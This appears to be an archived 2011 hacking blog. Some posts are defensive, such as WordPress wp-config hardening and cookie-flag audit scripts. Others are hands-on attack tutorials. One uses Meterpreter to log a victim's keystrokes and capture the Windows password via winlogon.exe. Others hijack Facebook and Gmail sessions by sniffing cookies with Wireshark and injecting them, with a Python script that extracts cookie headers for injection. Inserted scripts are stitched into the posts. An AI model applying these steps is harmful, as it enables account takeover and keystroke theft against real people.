Friday, July 29, 2011

From A Minor Bug To Zero Day - Exploit Development


While searching YouTube for videos on buffer overflow vulnerabilities, I came across an excellent Defcon presentation by Mati Aharoni which explains the complete life cycle of exploit development, from a simple bug to a zero day. The presentation walks through the whole process: fuzzing, locating the bug, the use of egg hunters and so on.


The vulnerability covered in the presentation is a buffer overflow in HP NNM (Network Node Manager); however, it is not as easy as it looks at first, and the author had to go through a lot of pain and complications to get the exploit working.

War Texting Allows Hackers To Unlock Car Doors Via SMS



Senior iSEC Partners researcher Don Bailey has developed an attack which allows an attacker to unlock car doors, hijack the car alarm system and even start the car. The method has been named "War Texting"; it took Don Bailey less than two hours to hijack the car's alarm system and remotely start the car.


Reports say Bailey will demonstrate the attack next week at the Black Hat security conference in Las Vegas, where he will give a live demonstration. The presentation is titled "War Texting".



According to iSEC Partners:

We are seeing more GSM [Global System for Mobile Communications]-enabled systems popping up in consumer culture and industrial control systems. They're not just in Zoombak [Global Positioning System] location devices and personal security control systems, but also in sensors deployed for waste treatment facilities, SCADA [Supervisory Control and Data Acquisition] and call-back systems, physical security systems, industrial control systems

Monday, July 25, 2011

How To Learn Batch Programming Fast And Easy

Batch programming is extremely helpful if you want to automate small tasks. It is restricted to the Windows platform, but it has lots of uses, and the best part is that it is very easy compared to other programming languages. While browsing Google for batch programming e-books I came across a fantastic book which teaches batch programming from the very beginning to an advanced level. The book is named "Batch File Programming" and is one of the most comprehensive books on batch programming I have ever read.

What are batch files?

Before you jump in and download this e-book, I would like to give a short introduction to batch programming. A batch file is a plain-text file containing a sequence of commands for the Windows command interpreter (cmd.exe, or COMMAND.COM on DOS), which are executed one after another as if typed at the prompt. Batch files can be identified by their .bat (or .cmd) extension.

Batch file programming can help you accomplish the following attacks:

  • DNS Poisoning
  • Packet flooders
  • Dictionary attacks
  • Virus Creation
  • Disabling of logs
Click here to get your hands on this wonderful e-book.

Wednesday, July 20, 2011

How To Use A Keylogger Inside Metasploit Using Meterpreter?

Well, I have made lots of posts on keylogging; indeed I have dedicated a whole book to this topic, "An Introduction To Keyloggers, RATs And Malware", which is available as a free download. If you are a regular reader of this blog, chances are you already know about keyloggers, as I have written about them over and over again. In this post I will show you a simple way to run a keylogger from within Metasploit once you have opened a Meterpreter session on the victim's computer. If you don't know what Metasploit is, kindly refer to the post "Metasploit For Beginners Explained".


What is a Meterpreter?

Meterpreter is Metasploit's in-memory post-exploitation payload. It runs inside the exploited process, writes nothing to disk by default, and gives you an interactive console with commands for listing and migrating between processes, transferring files, pivoting and capturing keystrokes. If you would like to learn more about Meterpreter, kindly do a Google search.

Requirements

  • Metasploit Framework
  • BackTrack 5
  • A Meterpreter session opened on a box
How To Use A Keylogger Inside Metasploit Using Meterpreter?

In this case I am using the Metasploit Framework from BackTrack 5, an awesome Linux distro specially dedicated to hackers and penetration testers. I used the Social Engineering Toolkit's browser autopwn to open a Meterpreter session on the victim's computer.


Step 1 - Before we start the keylogger and capture logs, we need to migrate into the explorer.exe process. Our session currently lives inside the exploited browser process, so it dies as soon as the victim closes the browser, and the keyscan commands only capture keystrokes of the desktop session their host process belongs to. To migrate we need the PID of explorer.exe, so type ps at the meterpreter prompt to list the running processes.


Step 2 - Once you know the exact PID, type migrate followed by the PID, so if the PID is 1372 you type migrate 1372 (Meterpreter commands are lowercase).

Step 3 - Type keyscan_start to start the keylogger.

Step 4 - Now just sit back and relax. To harvest the captured keystrokes type keyscan_dump; run it periodically to collect what has been typed so far, and type keyscan_stop when you are done. If you want the user's Windows password rather than what he types on the desktop, migrate into winlogon.exe instead and wait for him to lock and unlock the screen.


I hope you have liked this post and learned something new today. If you would like to re-publish this article on your website/blog, make sure that you give proper credit.

Thursday, July 14, 2011

Securing The wp-config.php File To Prevent Your WordPress Blog From Getting Hacked

If your blog runs on WordPress it is a bigger target than most other blogging platforms, because a default installation is not hardened and can be compromised easily. Before writing this post I searched the web for "WordPress Security" and found some really foolish tips that would not help you in any way, so I decided to write a post of my own. Many WordPress admins use plugins such as Login LockDown to stop brute-force attacks on the login page. The problem is that a skilled attacker rarely relies on brute force or a dictionary attack any more: most people now use passwords longer than 8 characters, and even where the password is weak, repeated login failures are usually throttled or blocked by the web server or by the host's IDS/IPS.

Phishing attacks are also not very common against WordPress blogs, and I have seen very few cases in which WordPress users fell for them. Almost every WordPress user logs into the dashboard by manually appending wp-admin to the URL, and bloggers are generally tech-savvy enough not to fall for a plain phishing page. If the attacker is smarter and uses more advanced techniques such as desktop phishing, tabnabbing or DNS spoofing, there is still a chance the WordPress user will fall for them.

So How Do Hackers Hack Into Wordpress Blogs?

Most skilled attackers will target wp-config.php, because by default it sits where it can be read. wp-config.php is the most important file in your WordPress installation: it holds the database host, name, user and password, the table prefix and the security keys and salts. Anyone who can read it can connect to your database directly and do whatever he likes with your blog, so hardening this file is the first step in protecting your WordPress blog. Here is how a wp-config.php file looks inside; as you can see, it contains very sensitive information.





Protecting wp-config.php With .htaccess

The first step you should take right away is to add the following to the .htaccess file in your WordPress directory. It tells Apache to refuse any direct HTTP request for wp-config.php, so a misconfiguration that stops PHP from executing (which would otherwise serve the file as plain text) does not expose it. The two directives inside the block are Apache 2.2 syntax; on Apache 2.4 the equivalent is the single directive Require all denied.
# protect wp-config.php
<files wp-config.php>
order allow,deny
deny from all
</files>
Changing The Permissions

Last week I came across a WordPress blog whose wp-config.php was world-readable; all the hacker needed to do was read the MySQL credentials from it and use them to access the victim's WordPress database. So the bottom line is that the file must not be readable by anyone except the account that runs PHP. Set it to 400 (owner read only) when PHP runs as your own user, which is the usual setup on shared hosts; if PHP runs as a separate web server user, 400 will give a permission-denied error and you need 440 with the web server's group instead.


Security Keys

Security keys were added in WordPress 2.6 to sign the information stored in the user's login cookies, so that a cookie cannot be forged or altered. They also make a stolen password hash far less useful: even if an attacker dumps the hashes from your database, he cannot build a valid authentication cookie without the keys. You can get a set of random keys and salts from the WordPress secret-key generator here; all you need to do is paste the generated define lines into your wp-config.php in place of the 'put your unique phrase here' placeholders. Changing the keys invalidates every existing login cookie, so all users will have to log in again.


Moving Your wp-config.php File

By default wp-config.php lives in the WordPress root folder. WordPress itself supports moving it one directory above the installation, outside the web root, and will look for it there automatically. This keeps the file out of reach of direct HTTP requests and of most file-disclosure bugs in the web root, and helps against the symlink bypass attack to some extent. It is not a substitute for the permissions above, though, since a symlink created from a neighbouring account can point at any path the web server user is able to read.

Moving To A VPS Or Dedicated Host To Prevent The Symlink Bypass Attack

On a shared host every customer's site is served by the same web server, so an attacker who controls any other account on the machine can create a symlink pointing at your wp-config.php and read it through his own site if the file is readable to the web server user. A WordPress blog on shared hosting is therefore a lot more exposed to the symlink bypass attack than one on a VPS or dedicated server. If your blog is well established and you can afford to move to a VPS or dedicated hosting, I would recommend moving right away.
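The four hardening steps above can be checked mechanically. The script below is an added example, not code from the original post or from WordPress: it audits a wp-config.php for world-readable permissions, security keys left at the sample placeholder, and a file still inside the web root without a deny rule in .htaccess (the .htaccess check is skipped once the file has been moved above the web root). The three sample layouts it builds in a temporary directory, the "k"*64 stand-in for a generated key, and the function names are this example's own assumptions.

```python
"""Added example: audit wp-config.php against the hardening steps in the post."""
import re
import stat
import tempfile
from pathlib import Path

# wp-config-sample.php ships with this placeholder in every key and salt.
PLACEHOLDER = "put your unique phrase here"
KEY_NAMES = (
    "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
    "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT",
)
DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)")
FILES_RULE_RE = re.compile(r"<files\s+wp-config\.php>(.*?)</files>", re.I | re.S)

# Constructed wp-config.php template; the database values are fake.
SAMPLE_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp');
define('DB_PASSWORD', 'example-password');
define('DB_HOST', 'localhost');
define('AUTH_KEY',         '{key}');
define('SECURE_AUTH_KEY',  '{key}');
define('LOGGED_IN_KEY',    '{key}');
define('NONCE_KEY',        '{key}');
define('AUTH_SALT',        '{key}');
define('SECURE_AUTH_SALT', '{key}');
define('LOGGED_IN_SALT',   '{key}');
define('NONCE_SALT',       '{key}');
$table_prefix = 'wp_';
"""
# The .htaccess block from the post (Apache 2.2 syntax).
HARDENED_HTACCESS = "# protect wp-config.php\n<files wp-config.php>\norder allow,deny\ndeny from all\n</files>\n"


def htaccess_denies(htaccess: Path) -> bool:
    """True if .htaccess blocks direct requests for wp-config.php (2.2 or 2.4 syntax)."""
    if not htaccess.exists():
        return False
    match = FILES_RULE_RE.search(htaccess.read_text())
    if not match:
        return False
    body = match.group(1).lower()
    return "deny from all" in body or "require all denied" in body


def audit_wp_config(config: Path, webroot: Path) -> list:
    """Return a list of findings; an empty list means every check passed."""
    findings = []
    mode = stat.S_IMODE(config.stat().st_mode)
    # 400 (owner only) or 440 (owner + web server group) pass; anything others can read fails.
    if mode & (stat.S_IROTH | stat.S_IWOTH | stat.S_IWGRP):
        findings.append(f"permissions {mode:o}: world-readable or group-writable (want 400 or 440)")
    defines = dict(DEFINE_RE.findall(config.read_text()))
    for name in KEY_NAMES:
        if defines.get(name, "") in ("", PLACEHOLDER):
            findings.append(f"{name} is missing or still the sample placeholder")
    if webroot.resolve() in config.resolve().parents:  # still inside the web root
        if not htaccess_denies(config.parent / ".htaccess"):
            findings.append("inside web root without a <Files wp-config.php> deny rule in .htaccess")
    return findings


def demo() -> dict:
    """Build three constructed layouts in a temp dir and audit each; returns {name: findings}."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        # weak: default layout, world-readable, placeholder keys, no .htaccess rule
        weak_root = Path(tmp, "weak", "public_html")
        weak_root.mkdir(parents=True)
        weak = weak_root / "wp-config.php"
        weak.write_text(SAMPLE_CONFIG.format(key=PLACEHOLDER))
        weak.chmod(0o644)
        results["weak"] = audit_wp_config(weak, weak_root)

        # htaccess: still in the web root, but mode 400, generated keys and a deny rule
        ht_root = Path(tmp, "htaccess", "public_html")
        ht_root.mkdir(parents=True)
        (ht_root / ".htaccess").write_text(HARDENED_HTACCESS)
        ht = ht_root / "wp-config.php"
        ht.write_text(SAMPLE_CONFIG.format(key="k" * 64))  # "k"*64 stands in for a generated key
        ht.chmod(0o400)
        results["htaccess"] = audit_wp_config(ht, ht_root)

        # moved: one level above the web root, mode 400, generated keys
        mv_root = Path(tmp, "moved", "public_html")
        mv_root.mkdir(parents=True)
        mv = mv_root.parent / "wp-config.php"
        mv.write_text(SAMPLE_CONFIG.format(key="k" * 64))
        mv.chmod(0o400)
        results["moved"] = audit_wp_config(mv, mv_root)
    return results


if __name__ == "__main__":
    for layout, findings in demo().items():
        print(layout, findings or "OK")
```

Run it against a real install as audit_wp_config(Path("/path/to/wp-config.php"), Path("/path/to/public_html")); the weak layout produces ten findings (one for the mode, eight placeholder keys, one for the missing .htaccess rule), the other two produce none.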

I hope you have liked my post on WordPress security. If you are looking for more ways to protect your WordPress blog, I would recommend reading the following post:

Thursday, July 7, 2011

Facebook Cookie Stealing And Session Hijacking


Three days ago I finished the series on Gmail Session Hijacking and Cookie Stealing. Due to the tremendous response from readers I planned to write a post on Facebook cookie stealing and session hijacking. Facebook session hijacking can also be accomplished with a very popular tool called Firesheep (on a Wi-Fi network only), which I won't explain here because I have already covered it in my post Facebook Hacking Made Easy With Firesheep.
In this tutorial I will explain how an attacker can capture your authentication cookies on a local area network and use them to hijack your Facebook account. Before reading this tutorial I would recommend part 1, part 2 and part 3 of my Gmail Session Hijacking and Cookie Stealing series, so you have a better understanding of what I am doing here.

Facebook Authentication Cookies

Facebook recognises a logged-in browser by the cookies it sends with every request. The one this tutorial filters on is called datr; it is a long-lived browser identifier that Facebook sets on every visitor, which makes it a convenient marker for Facebook traffic, but on its own it does not log anyone in. The login session is carried by the c_user (user id) and xs (session secret) cookies sent alongside it, which is why the whole Cookie header, not just the datr value, has to be copied and injected. If an attacker gets hold of that cookie set, all he needs to do is inject it into his own browser and he will gain access to your account. This is how the datr cookie looks on the wire:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use a variety of methods to steal your Facebook cookies, depending on the network he is on. On a hub-based network he just sniffs the traffic with any packet sniffer, since every frame reaches every port.

On a switched network he uses ARP poisoning (ARP spoofing) to redirect the victim's traffic through his own machine before sniffing it. On an open or shared-key wireless network he just needs Firesheep to capture the cookies and gain access to the victim's account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

Step 1 - First of all, download Wireshark from the official website and install it.

Step 2 - Open Wireshark, click on Capture and then on Interfaces.

Step 3 - Choose the interface the victim's traffic passes through and click Start.




Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10 minutes stop the capture by going to the Capture menu and clicking Stop.

Step 6 - Set the display filter at the top to http.cookie contains "datr". This shows only the HTTP requests whose Cookie header contains "datr", i.e. requests to Facebook from a browser that has been there before. Pick one from a logged-in user: it will carry c_user and xs alongside datr.


Step 7 - Expand the packet, right-click the Cookie line in the HTTP section and go to Copy - Bytes - Printable Text Only.


Step 8 - Open Firefox. You will need both Greasemonkey and the Cookie Injector user script. Now open facebook.com and make sure that you are not logged in.

Step 9 - Press Alt+C to bring up the cookie injector and paste the copied cookie text into it.


Step 10 - Refresh the page and voilà, you are logged in to the victim's Facebook account.
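Steps 6 and 7 above are the heart of the attack: filter the capture for requests whose Cookie header mentions datr, then copy that header. The script below does the same in Python so the logic can be inspected offline. It is an added example and not part of the original post; the two plaintext HTTP requests it parses are constructed for this example, and every host, path and cookie value in them is made up. It also checks for the c_user and xs cookies, which carried the Facebook login session at the time of the post, because the datr value alone does not authenticate anyone.

```python
"""Added example: filter plaintext HTTP requests by cookie and extract the Cookie header."""
from __future__ import annotations

from dataclasses import dataclass, field

# Constructed capture: two plaintext HTTP requests exactly as they appear on the wire.
CAPTURE = (
    "GET /home.php HTTP/1.1\r\n"
    "Host: www.facebook.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: datr=1276721606-b7f94f97; lu=gg7Z3; c_user=100001234567890; xs=123%3Aabcdef0123456789\r\n"
    "\r\n"
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Cookie: PHPSESSID=0a1b2c3d4e5f\r\n"
    "\r\n"
)

# At the time of the post, Facebook's login session was carried by c_user and xs;
# datr on its own is a long-lived browser identifier and does not log anyone in.
SESSION_COOKIES = ("c_user", "xs")


@dataclass
class HttpRequest:
    method: str
    path: str
    host: str
    cookie_header: str  # raw Cookie header value, the text Wireshark's Copy would give you
    cookies: dict[str, str] = field(default_factory=dict)


def parse_cookie_header(value: str) -> dict[str, str]:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}; values are kept URL-encoded as sent."""
    cookies: dict[str, str] = {}
    for pair in value.split(";"):
        name, sep, val = pair.strip().partition("=")
        if sep:
            cookies[name.strip()] = val.strip()
    return cookies


def parse_requests(capture: str) -> list[HttpRequest]:
    """Parse every HTTP request in a plaintext capture; each request ends with a blank line."""
    requests: list[HttpRequest] = []
    for raw in capture.split("\r\n\r\n"):
        lines = raw.split("\r\n")
        request_line = lines[0].split(" ")
        if len(request_line) != 3 or not request_line[2].startswith("HTTP/"):
            continue  # empty trailing chunk, or not a request line
        headers: dict[str, str] = {}
        for line in lines[1:]:
            name, sep, val = line.partition(":")
            if sep:
                headers[name.strip().lower()] = val.strip()
        cookie_header = headers.get("cookie", "")
        requests.append(HttpRequest(request_line[0], request_line[1], headers.get("host", ""),
                                    cookie_header, parse_cookie_header(cookie_header)))
    return requests


def filter_by_cookie(requests: list[HttpRequest], needle: str = "datr") -> list[HttpRequest]:
    """Equivalent of the Wireshark display filter  http.cookie contains "<needle>"."""
    return [r for r in requests if needle in r.cookie_header]


def has_session_cookies(request: HttpRequest) -> bool:
    """True only if the request carries the cookies that actually authenticate the session."""
    return all(name in request.cookies for name in SESSION_COOKIES)


def cookie_header_for_injection(request: HttpRequest) -> str:
    """Rebuild the 'name=value; name=value' text to paste into the cookie injector."""
    return "; ".join(f"{name}={value}" for name, value in request.cookies.items())


if __name__ == "__main__":
    for req in filter_by_cookie(parse_requests(CAPTURE)):
        print(req.host, "session:", has_session_cookies(req))
        print(cookie_header_for_injection(req))
```

Only the request to www.facebook.com matches the datr filter, and because it also carries c_user and xs it is a usable session; the www.example.com request is ignored, exactly as Wireshark would hide it. The rebuilt header is identical to the captured one, since Python dicts preserve insertion order.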



Note: This attack only works when the victim's browser sends its cookies over plain http://. If the victim has enabled Facebook's always-on HTTPS option (Secure Browsing), so that every request and not just the login goes over https:// and the session cookies carry the Secure flag, the cookies never appear on the wire in the clear and there is nothing to capture.


Countermeasures

The best way to protect yourself against a session hijacking attack is to use an https:// connection for the whole session, not only when you log in, on Facebook, Gmail, Hotmail or any other account; enable the "always use HTTPS" option wherever the site offers one. Your cookies then travel inside the encrypted TLS connection, so even an attacker sniffing the network never sees them. Logging out when you are done also helps, because it invalidates the session on the server side, and so does staying off open Wi-Fi unless you use a VPN.

Tuesday, July 5, 2011

Wordpress 3.2 Released - Much More Secure

WordPress released version 3.2 a couple of hours ago. WordPress 3.2 comes with lots of major and minor bug fixes, including security fixes, so it is more secure than previous versions and you should upgrade. WordPress 3.2 requires a minimum of MySQL 5.0.15 and PHP 5.2.4 (PHP 4 and MySQL 4 are no longer supported); if the upgrade fails with errors, your server is probably still running an older version, so contact your hosting provider immediately.




WordPress 3.2 also comes with a very neat and clean design: a fully refreshed admin interface and a full-screen editor for distraction-free blogging.
According to WordPress officials:
WordPress 3.2 in 40 words or less: WordPress comes with a refreshed admin design, a full screen editor for distraction free blogging, a new default HTML theme and an extended admin bar.

Sunday, July 3, 2011

Gmail Cookie Stealing And Session Hijacking Part 3


So friends, this is the third part of my Gmail Session Hijacking and Cookie Stealing series on RHA. In the first part I introduced you to the basics and fundamentals of a session hijacking attack, and in the second part to the variety of methods used to capture session cookies. In this part I will show you how to carry out the session hijacking attack once you have the session cookies.


Cookie Injection With A Firefox WebBrowser

There are a variety of add-ons for injecting cookies into your browser, depending on which browser you are using. I would recommend Firefox, as it supports a large number of cookie-editing add-ons.

Web Developer Toolbar

Web Developer Toolbar is an add-on for Firefox which makes the process of injecting cookies extremely easy. All you have to do is install the toolbar, open the Cookies drop-down menu, choose View Cookie Information and click Edit Cookie next to the cookie you want to change.


Once you have clicked on Edit Cookie, you will be brought to the following screen:


Next, replace your cookie value with the victim's cookie value and save.


If you captured the cookies with Wireshark, then instead of Web Developer Toolbar you can use Cookie Injector to inject them directly into your browser. All you need to do is press Alt+C after installing the Cookie Injector script, paste the Wireshark cookie dump and press OK. Then refresh the page and you will be in the victim's account.


Note: In order to install the Cookie Injector user script you first need to install the Greasemonkey add-on for Firefox.


Cookie Manager is my preferred choice for performing a session hijacking attack, since it is very user-friendly and extremely easy to use. You can view Cookie Manager's usage guide here.

Cookie Injection With Google Chrome



If you are too lazy to use Firefox for cookie injection, then luckily there are a few Google Chrome extensions for editing cookies that let you inject the victim's cookies into your browser and take control of the account. One of my favourite cookie-editing extensions is Cookie Editor by Philip, which has a very user-friendly interface.


Drawbacks Of A Session Hijacking Attack:

With so many advantages of a session hijacking attack there are some drawbacks that you also need to know.

1. Cookie stealing by sniffing becomes useless if the victim uses https:// for the whole session and the site marks its session cookies Secure, since the cookies then never travel in the clear.

2. Most session cookies are invalidated on the server once the victim clicks Logout, and hence the attacker is logged out of the account as well.

3. Many sites do not allow parallel logins (several active sessions on one account), or tie the session to the client's IP address, which also makes cookie stealing useless.

Protection Against A Session Hijacking Attack

The best way to protect yourself against a session hijacking attack is to use an https:// connection for the whole session, not only while logging in, on Facebook, Gmail, Hotmail or any other account. Your cookies then travel inside the encrypted TLS connection, so even if an attacker is sniffing the network he never sees them and has nothing to inject. Log out when you are done, so that the session is invalidated on the server, and avoid open Wi-Fi unless you use a VPN.
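The countermeasure above, and the one at the end of the Facebook post, depends on more than the login page being HTTPS: a session cookie that the site issues without the Secure attribute is sent by the browser on any http:// request to the same host, so a single plain-HTTP link or image on the page hands it to the sniffer anyway. The script below is an added example, not code from the original posts or from any of the sites named: it parses Set-Cookie response headers and reports session cookies that lack the Secure flag (capturable by a sniffer) or the HttpOnly flag (readable by injected script). The three sets of Set-Cookie headers and the list of cookie names treated as session identifiers are constructed for this example.

```python
"""Added example: check Set-Cookie headers for the flags that defeat cookie sniffing."""
from __future__ import annotations

# Constructed responses: three fictitious hosts with different cookie hygiene.
RESPONSES = {
    "hardened.example": [
        "Set-Cookie: sid=7f3a9c2e; Path=/; Domain=.hardened.example; Secure; HttpOnly",
        "Set-Cookie: lang=en; Path=/",
    ],
    "partial.example": [
        "Set-Cookie: sid=5e2d7a1b; Path=/; Secure",
    ],
    "weak.example": [
        "Set-Cookie: sid=1c4b8d2f; Path=/; Domain=.weak.example; Expires=Thu, 01-Jan-2015 00:00:00 GMT",
        "Set-Cookie: lang=en; Path=/",
    ],
}

# Cookie names treated as session identifiers for this example (an assumption;
# c_user and xs were Facebook's, SID and HSID Google's, at the time of the posts).
SESSION_NAMES = {"sid", "c_user", "xs", "SID", "HSID", "PHPSESSID"}


def parse_set_cookie(header: str) -> tuple[str, str, dict[str, str | None]]:
    """Split 'Set-Cookie: name=value; Attr; Attr=val' into (name, value, {attr: val})."""
    _, _, body = header.partition(":")
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: dict[str, str | None] = {}
    for part in parts[1:]:
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else None  # flags have no value
    return name.strip(), value.strip(), attrs


def audit_cookies(headers: list[str]) -> list[str]:
    """One finding per session cookie that a passive sniffer or injected script could read."""
    findings: list[str] = []
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        if name not in SESSION_NAMES:
            continue  # preference cookies such as lang= are not worth stealing
        if "secure" not in attrs:
            findings.append(f"{name}: no Secure flag, sent in the clear on any http:// request")
        if "httponly" not in attrs:
            findings.append(f"{name}: no HttpOnly flag, readable by script (XSS)")
    return findings


def audit_all(responses: dict[str, list[str]] = RESPONSES) -> dict[str, list[str]]:
    """Audit every host's Set-Cookie headers; hosts with no findings map to an empty list."""
    return {host: audit_cookies(headers) for host, headers in responses.items()}


if __name__ == "__main__":
    for host, findings in audit_all().items():
        print(host, findings or "OK")
```

Feed it the Set-Cookie lines from a real login response (Live HTTP Headers or Wireshark will show them) to see whether "always use HTTPS" on a given site actually protects the session cookie, or only the password.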

So friends, I hope you have enjoyed the Gmail Session Hijacking and Cookie Stealing series. Depending on readers' response I might make a tutorial on Facebook session hijacking too. If you have any questions, feel free to ask.